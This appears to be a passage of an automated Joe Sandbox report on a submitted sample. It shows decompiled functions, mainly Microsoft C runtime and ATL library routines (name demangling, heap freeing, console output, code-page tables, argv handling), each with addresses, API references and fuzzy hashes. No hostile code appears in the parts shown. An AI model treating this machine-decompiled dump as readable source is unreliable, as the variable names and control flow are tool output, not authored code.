                      0x00966986
                      0x00966990
                      0x009669a9
                      0x009669be
                      0x009669c6
                      0x009669cb
                      0x009669cd
                      0x00966a57
                      0x00966a5c
                      0x00000000
                      0x00966a61
                      0x009669d3
                      0x009669db
                      0x009669de
                      0x00000000
                      0x00000000
                      0x009669e0
                      0x009669e6
                      0x009669e9
                      0x009669fe
                      0x00966a01
                      0x00966a0b
                      0x00966a24
                      0x00966a29
                      0x00966a32
                      0x00966a35
                      0x00000000
                      0x00000000
                      0x00966a37
                      0x00966a40
                      0x00966a4d
                      0x00000000
                      0x00966a52
                      0x00966997
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00966997
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • DName::isValid.LIBCMTD ref: 009669C6
                      • Mailbox.LIBCMTD ref: 00966A4D
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name$MailboxName::Name::isNode::makeStatusValid
                      • String ID:
                      • API String ID: 3478594962-0
                      • Opcode ID: feb29abf6c4ca4ff065c2c045c4089d8fcb2775e9cff7f30b14f72a22591d580
                      • Instruction ID: e6bf745e77c866f492b1832aa54095ddd70dda4327db998dfa3962d062415255
                      • Opcode Fuzzy Hash: feb29abf6c4ca4ff065c2c045c4089d8fcb2775e9cff7f30b14f72a22591d580
                      • Instruction Fuzzy Hash: 2C2156B1950104ABDB04EF50DCA2FAE7B74BF80305F148169F81A6B191DF71AA54CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00965B40 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00965B40(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v12;
				char _v20;
				char* _t12;
				intOrPtr _t20;
				char* _t30;

				_t12 =  *0xb30640; // 0x0
				if( *_t12 != 0) {
					E009686C0(__ebx, __edi, __esi,  &_v12);
					E0095FDE0( &_v12, 0x2e);
					E0095FD40( &_v12, E0096A1E0(__ebx, __edi, __esi,  &_v20, 0, 0));
					_t30 =  *0xb30640; // 0x0
					if( *_t30 != 0x40) {
						E0095F350(_a4, 2);
						return _a4;
					}
					_t20 =  *0xb30640; // 0x0
					 *0xb30640 = _t20 + 1;
					E0095F240(_a4,  &_v12);
					return _a4;
				}
				E0095F350(_a4, 1);
				return _a4;
			}








                      0x00965b46
                      0x00965b50
                      0x00965b65
                      0x00965b72
                      0x00965b8b
                      0x00965b90
                      0x00965b9c
                      0x00965bc1
                      0x00000000
                      0x00965bc6
                      0x00965b9e
                      0x00965ba6
                      0x00965bb2
                      0x00000000
                      0x00965bb7
                      0x00965b57
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00965B57
                        • Part of subcall function 0095F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 0095F3AE
                      • DName::operator+=.LIBCMTD ref: 00965B72
                      • Mailbox.LIBCMTD ref: 00965BB2
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name$MailboxName::Name::operator+=Node::makeStatus
                      • String ID:
                      • API String ID: 481169399-0
                      • Opcode ID: e91d12c2ddb1ce76236e4ecb723ad031aff592c5f13fa0826ea077ae27d59d3d
                      • Instruction ID: 362e3b749db9e06f005e56495a57533ffb5f287ab624ffec3bcfb92c0aac0756
                      • Opcode Fuzzy Hash: e91d12c2ddb1ce76236e4ecb723ad031aff592c5f13fa0826ea077ae27d59d3d
                      • Instruction Fuzzy Hash: B501967064010467EB04EF60DCA3FAE3774AF80345F040068F8095F195DF71BA44CB81
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00946860 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 40memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 89%
                      			E00946860(intOrPtr __ecx, void* __esi, void* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t19;
				void* _t20;

				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				if(_a4 != 0) {
					_v12 = E009D1520(HeapFree( *(_v8 + 4), 0, _a4), _t20 - _t20);
					_t24 = _v12;
					if(_v12 == 0) {
						_t10 = L00994930(_t24, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlmem.h", 0x9a, 0, "%ls", L"bSuccess");
						_t20 = _t20 + 0x18;
						if(_t10 == 1) {
							asm("int3");
						}
					}
				}
				return E009D1520(_t10, _t19 - _t20 + 8);
			}







                      0x00946867
                      0x0094686e
                      0x00946875
                      0x0094687c
                      0x0094689a
                      0x0094689d
                      0x009468a1
                      0x009468bb
                      0x009468c0
                      0x009468c6
                      0x009468c8
                      0x009468c8
                      0x009468c6
                      0x009468a1
                      0x009468d7

                      APIs
                      • HeapFree.KERNEL32(?,00000000,00000000), ref: 0094688D
                      Strings
                      • %ls, xrefs: 009468A8
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlmem.h, xrefs: 009468B4
                      • bSuccess, xrefs: 009468A3
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: FreeHeap
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlmem.h$bSuccess
                      • API String ID: 3298025750-1732559737
                      • Opcode ID: d72918cef35fb6cbf2fea514ece93f5bb5c9a26ff5841f6e8502799175850268
                      • Instruction ID: 830bec4b331b9bdbbb20e8f1290d37d7c9d0bc4aed80a9d02c0261b668f0943e
                      • Opcode Fuzzy Hash: d72918cef35fb6cbf2fea514ece93f5bb5c9a26ff5841f6e8502799175850268
                      • Instruction Fuzzy Hash: 99F0C872E80318BBCB10AF9CAC47FAD77389B41705F108199F90426381D6B19A9487D6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009538E0 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                      Download Yara Rule
                      C-Code - Quality: 59%
                      			E009538E0(void* __esi, CHAR* _a4) {
				void* _t5;
				CHAR* _t7;
				char* _t8;
				void* _t16;
				void* _t17;

				do {
					_t18 = _a4;
					if(_a4 == 0) {
						_t5 = L00994930(_t18, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlcore.h", 0x226, 0, "%ls", L"p != 0");
						_t17 = _t17 + 0x18;
						if(_t5 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				if( *_a4 != 0) {
					_t7 = CharNextA(_a4);
					__eflags = _t17 - _t17;
					_t8 = E009D1520(_t7, __eflags);
				} else {
					_t8 =  &(_a4[1]);
				}
				return E009D1520(_t8, _t16 - _t17);
			}








                      0x009538e4
                      0x009538e4
                      0x009538e8
                      0x00953902
                      0x00953907
                      0x0095390d
                      0x0095390f
                      0x0095390f
                      0x0095390d
                      0x00953910
                      0x0095391c
                      0x0095392e
                      0x00953934
                      0x00953936
                      0x0095391e
                      0x00953921
                      0x00953921
                      0x00953944

                      Strings
                      • %ls, xrefs: 009538EF
                      • p != 0, xrefs: 009538EA
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcore.h, xrefs: 009538FB
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlcore.h$p != 0
                      • API String ID: 0-1831341932
                      • Opcode ID: 1f0c83ead95aa0de165a16f2959a6ee77eb120288692e248a148bae0eb8ec786
                      • Instruction ID: a65fd56f0e84f6a93ae775cb436806c5d01b61f96d89bec85893dff9a3ad151f
                      • Opcode Fuzzy Hash: 1f0c83ead95aa0de165a16f2959a6ee77eb120288692e248a148bae0eb8ec786
                      • Instruction Fuzzy Hash: 5DF02E72644318B7DF10EB55DC43B7D374C5B417C6F008511FE0959281D5A5DF8047C5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009CD00B Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E009CD00B(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0xa068e0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					L009CCFF4();
					E009CCFB6();
					_t13 = WriteConsoleW( *0xa068e0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                      0x009cd028
                      0x009cd02c
                      0x009cd039
                      0x009cd03e
                      0x009cd059
                      0x009cd059
                      0x009cd05f

                      APIs
                      • WriteConsoleW.KERNEL32(009C3E47,?,?,00000000,?,?,009C9737,009C3E47,00000001,?,?,?,009C3E47,?), ref: 009CD022
                      • GetLastError.KERNEL32(?,?,009C9737,009C3E47,00000001,?,?,?,009C3E47,?,?,?,?,009C4B29,?,?), ref: 009CD02E
                        • Part of subcall function 009CCFF4: CloseHandle.KERNEL32(FFFFFFFE,009CD03E,?,?,009C9737,009C3E47,00000001,?,?,?,009C3E47,?,?,?,?,009C4B29), ref: 009CD004
                      • ___initconout.LIBCMT ref: 009CD03E
                        • Part of subcall function 009CCFB6: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,009CCFE5,009C9724,?,?,009C3E47,?), ref: 009CCFC9
                      • WriteConsoleW.KERNEL32(009C3E47,?,?,00000000,?,?,009C9737,009C3E47,00000001,?,?,?,009C3E47,?), ref: 009CD053
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: 6cb1630f476c28832922e8a230b1ab9cd6626621dfe1fb79ea0630318fca9742
                      • Instruction ID: d54404ef58443d27540c663381190ee96c52515b919e5990517c18274bb13e76
                      • Opcode Fuzzy Hash: 6cb1630f476c28832922e8a230b1ab9cd6626621dfe1fb79ea0630318fca9742
                      • Instruction Fuzzy Hash: B6F01C36841128BBCF226FD5DC04F9A3F66EB493A1F05801AFE0995121D632C861EB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009AF5F0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 97%
                      			E009AF5F0(void* __edi, signed int _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				struct _cpinfo _v1820;
				signed int _v1824;
				signed int _v1828;
				signed int _t121;
				signed int _t149;
				signed int _t151;
				void* _t153;
				signed int _t157;
				signed int _t173;
				signed int _t175;
				signed int _t182;
				signed int _t201;
				signed int _t209;
				void* _t211;
				void* _t212;
				signed int _t214;
				signed int _t216;

				_t211 = __edi;
				_t214 = _t216;
				_t121 =  *0xa0600c; // 0x5d529087
				_v8 = _t121 ^ _t214;
				_t123 = _a4;
				if( *(_a4 + 4) == 0xfde9) {
					L26:
					_v1824 = 0;
					while(1) {
						__eflags = _v1824 - 0x100;
						if(_v1824 >= 0x100) {
							goto L37;
						}
						__eflags = _v1824 - 0x41;
						if(_v1824 < 0x41) {
							L32:
							__eflags = _v1824 - 0x61;
							if(_v1824 < 0x61) {
								L35:
								_t123 = _a4 + _v1824;
								__eflags = _t123;
								 *((char*)(_t123 + 0x119)) = 0;
							} else {
								__eflags = _v1824 - 0x7a;
								if(_v1824 > 0x7a) {
									goto L35;
								} else {
									_t123 = _a4 + _v1824;
									 *(_a4 + _v1824 + 0x19) =  *(_a4 + _v1824 + 0x19) & 0x000000ff | 0x00000020;
									_t187 = _a4 + _v1824;
									 *((char*)(_a4 + _v1824 + 0x119)) = _v1824 - 0x20;
								}
							}
						} else {
							__eflags = _v1824 - 0x5a;
							if(_v1824 > 0x5a) {
								goto L32;
							} else {
								 *(_a4 + _v1824 + 0x19) =  *(_a4 + _v1824 + 0x19) & 0x000000ff | 0x00000010;
								_t187 = _v1824 + 0x20;
								_t123 = _a4 + _v1824;
								 *((char*)(_a4 + _v1824 + 0x119)) = _v1824 + 0x20;
							}
						}
						_t157 = _v1824 + 1;
						__eflags = _t157;
						_v1824 = _t157;
					}
				} else {
					_t187 = _a4;
					if(GetCPInfo( *(_a4 + 4),  &_v1820) == 0) {
						goto L26;
					} else {
						_v1824 = 0;
						while(_v1824 < 0x100) {
							 *((char*)(_t214 + _v1824 - 0x104)) = _v1824;
							_v1824 = _v1824 + 1;
						}
						 *((char*)(_t214 + 0xfffffffffffffefc)) = 0x20;
						_v1828 = _t214 + 0xfffffffffffff8ee;
						while(1) {
							__eflags =  *_v1828 & 0x000000ff;
							if(__eflags == 0) {
								break;
							}
							_v1824 =  *_v1828 & 0x000000ff;
							while(1) {
								_t149 = _v1828;
								__eflags = _v1824 - ( *(_t149 + 1) & 0x000000ff);
								if(_v1824 > ( *(_t149 + 1) & 0x000000ff)) {
									break;
								}
								__eflags = _v1824 - 0x100;
								if(_v1824 < 0x100) {
									 *((char*)(_t214 + _v1824 - 0x104)) = 0x20;
									_t209 = _v1824 + 1;
									__eflags = _t209;
									_v1824 = _t209;
									continue;
								}
								break;
							}
							_t151 = _v1828 + 2;
							__eflags = _t151;
							_v1828 = _t151;
						}
						E009B5170(_t153, _t211, _t212, __eflags, 0, 1,  &_v264, 0x100,  &_v1800,  *(_a4 + 4), 0);
						E009B8FB0(_t153, _t212, 0,  *((intOrPtr*)(_a4 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_a4 + 4), 0);
						_t187 = _a4;
						_t123 = E009B8FB0(_t153, _t212, 0,  *((intOrPtr*)(_a4 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_a4 + 4), 0);
						_v1824 = 0;
						while(1) {
							__eflags = _v1824 - 0x100;
							if(_v1824 >= 0x100) {
								break;
							}
							_t201 = _v1824;
							__eflags =  *(_t214 + _t201 * 2 - 0x704) & 1;
							if(( *(_t214 + _t201 * 2 - 0x704) & 1) == 0) {
								_t173 = _v1824;
								_t187 =  *(_t214 + _t173 * 2 - 0x704) & 2;
								__eflags =  *(_t214 + _t173 * 2 - 0x704) & 2;
								if(( *(_t214 + _t173 * 2 - 0x704) & 2) == 0) {
									_t123 = _a4 + _v1824;
									__eflags = _t123;
									 *((char*)(_t123 + 0x119)) = 0;
								} else {
									 *(_a4 + _v1824 + 0x19) =  *(_a4 + _v1824 + 0x19) & 0x000000ff | 0x00000020;
									_t123 = _a4 + _v1824;
									_t182 = _v1824;
									_t187 =  *((intOrPtr*)(_t214 + _t182 - 0x304));
									 *((char*)(_a4 + _v1824 + 0x119)) =  *((intOrPtr*)(_t214 + _t182 - 0x304));
								}
							} else {
								 *(_a4 + _v1824 + 0x19) =  *(_a4 + _v1824 + 0x19) & 0x000000ff | 0x00000010;
								_t187 = _v1824;
								_t123 =  *((intOrPtr*)(_t214 + _t187 - 0x204));
								 *((char*)(_a4 + _v1824 + 0x119)) =  *((intOrPtr*)(_t214 + _t187 - 0x204));
							}
							_t175 = _v1824 + 1;
							__eflags = _t175;
							_v1824 = _t175;
						}
					}
				}
				L37:
				__eflags = _v8 ^ _t214;
				return E00957280(_t123, _t153, _v8 ^ _t214, _t187, _t211, _t212);
			}

























                      0x009af5f0
                      0x009af5f3
                      0x009af5fb
                      0x009af602
                      0x009af605
                      0x009af60f
                      0x009af87b
                      0x009af87b
                      0x009af896
                      0x009af896
                      0x009af8a0
                      0x00000000
                      0x00000000
                      0x009af8a6
                      0x009af8ad
                      0x009af8ee
                      0x009af8ee
                      0x009af8f5
                      0x009af936
                      0x009af939
                      0x009af939
                      0x009af93f
                      0x009af8f7
                      0x009af8f7
                      0x009af8fe
                      0x00000000
                      0x009af900
                      0x009af913
                      0x009af919
                      0x009af928
                      0x009af92e
                      0x009af92e
                      0x009af8fe
                      0x009af8af
                      0x009af8af
                      0x009af8b6
                      0x00000000
                      0x009af8b8
                      0x009af8d1
                      0x009af8da
                      0x009af8e0
                      0x009af8e6
                      0x009af8e6
                      0x009af8b6
                      0x009af88d
                      0x009af88d
                      0x009af890
                      0x009af890
                      0x009af615
                      0x009af61c
                      0x009af62b
                      0x00000000
                      0x009af631
                      0x009af631
                      0x009af64c
                      0x009af664
                      0x009af646
                      0x009af646
                      0x009af675
                      0x009af68c
                      0x009af6a3
                      0x009af6ac
                      0x009af6ae
                      0x00000000
                      0x00000000
                      0x009af6b9
                      0x009af6d0
                      0x009af6d0
                      0x009af6da
                      0x009af6e0
                      0x00000000
                      0x00000000
                      0x009af6e2
                      0x009af6ec
                      0x009af6f4
                      0x009af6c7
                      0x009af6c7
                      0x009af6ca
                      0x00000000
                      0x009af6ca
                      0x00000000
                      0x009af6ec
                      0x009af69a
                      0x009af69a
                      0x009af69d
                      0x009af69d
                      0x009af720
                      0x009af75a
                      0x009af788
                      0x009af794
                      0x009af79c
                      0x009af7b7
                      0x009af7b7
                      0x009af7c1
                      0x00000000
                      0x00000000
                      0x009af7c7
                      0x009af7d5
                      0x009af7d8
                      0x009af814
                      0x009af822
                      0x009af822
                      0x009af825
                      0x009af864
                      0x009af864
                      0x009af86a
                      0x009af827
                      0x009af840
                      0x009af846
                      0x009af84c
                      0x009af852
                      0x009af859
                      0x009af859
                      0x009af7da
                      0x009af7f3
                      0x009af7ff
                      0x009af805
                      0x009af80c
                      0x009af80c
                      0x009af7ae
                      0x009af7ae
                      0x009af7b1
                      0x009af7b1
                      0x009af876
                      0x009af62b
                      0x009af94b
                      0x009af94e
                      0x009af958

                      APIs
                      • GetCPInfo.KERNEL32(0000FDE9,?), ref: 009AF623
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Info
                      • String ID: $z
                      • API String ID: 1807457897-2251613814
                      • Opcode ID: ac633119ef9944fa52af1b2d8bf642353c6d31f7a1aefda698848341687f0213
                      • Instruction ID: 05c0fabfb6d923d11bc575911c449325f1339ddf0942a591edbe0e1d19bd367e
                      • Opcode Fuzzy Hash: ac633119ef9944fa52af1b2d8bf642353c6d31f7a1aefda698848341687f0213
                      • Instruction Fuzzy Hash: 52A13E74E4825C9FDB25CF88C891BE9BB75EF45304F1481E9D94D5B282C278AA92CFD0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009AEB30 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108timeCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E009AEB30(intOrPtr* __ecx, void* __edi) {
				intOrPtr* _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _t49;
				intOrPtr _t78;

				_v8 = __ecx;
				_t49 = _v8;
				_t78 = _v8;
				_t4 = _t49 + 4; // 0x7400f87d
				_t5 = _t78 + 8; // 0x8b026a13
				if( *_t4 ==  *_t5) {
					if( *_v8 != 0) {
						_t20 = _v8 + 8; // 0x8b026a13
						_v16 =  *_t20 -  *_v8 >> 2;
						if(_v16 <= 0x7fffffff) {
							_v20 = _v16 << 1;
							if((E0099C099(E0099B480( &_v12, E009997D0(_v20, __edi,  *_v8, _v20, 4, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x67)),  &_v12) & 0x000000ff) != 0) {
								 *_v8 = E0099B610( &_v12);
								 *((intOrPtr*)(_v8 + 4)) =  *_v8 + _v16 * 4;
								 *((intOrPtr*)(_v8 + 8)) =  *_v8 + _v20 * 4;
								_v32 = 0;
								E0099B4E0( &_v12);
								return _v32;
							}
							_v28 = 0xc;
							E0099B4E0( &_v12);
							return _v28;
						}
						return 0xc;
					}
					_v36 = 4;
					 *_v8 = E0099B610(E0099B480( &_v24, L009992C0(_t78, __edi, 4, 4, 2, "minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_wildcards.cpp", 0x57)));
					E0099B4E0( &_v24);
					if( *_v8 != 0) {
						 *((intOrPtr*)(_v8 + 4)) =  *_v8;
						 *((intOrPtr*)(_v8 + 8)) =  *_v8 + 0x10;
						return 0;
					}
					return 0xc;
				}
				return 0;
			}













                      0x009aeb38
                      0x009aeb3b
                      0x009aeb3e
                      0x009aeb41
                      0x009aeb44
                      0x009aeb47
                      0x009aeb56
                      0x009aebce
                      0x009aebd6
                      0x009aebe0
                      0x009aebf1
                      0x009aec27
                      0x009aec48
                      0x009aec58
                      0x009aec69
                      0x009aec6c
                      0x009aec76
                      0x00000000
                      0x009aec7b
                      0x009aec29
                      0x009aec33
                      0x00000000
                      0x009aec38
                      0x00000000
                      0x009aebe2
                      0x009aeb58
                      0x009aeb87
                      0x009aeb8c
                      0x009aeb97
                      0x009aebab
                      0x009aebb9
                      0x00000000
                      0x009aebbc
                      0x00000000
                      0x009aeb99
                      0x00000000

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 009AEB78
                      Strings
                      • minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp, xrefs: 009AEB61, 009AEBF6
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: minkernel\crts\ucrt\src\appcrt\startup\argv_wildcards.cpp
                      • API String ID: 4219598475-2801755846
                      • Opcode ID: 83c4a21f7d737717e169441b30c834a69827992a25a46a7701de27d78c53933f
                      • Instruction ID: d089f62099d3c6202b4597e48679692c306d62f62eca216700a9802b464236aa
                      • Opcode Fuzzy Hash: 83c4a21f7d737717e169441b30c834a69827992a25a46a7701de27d78c53933f
                      • Instruction Fuzzy Hash: E3413874A00109EFDF14DF98C981EAEB7B5EF85304F208598E516AB395DB34AE41DF90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0095C690 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E0095C690(void* __edi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _t32;
				intOrPtr _t45;
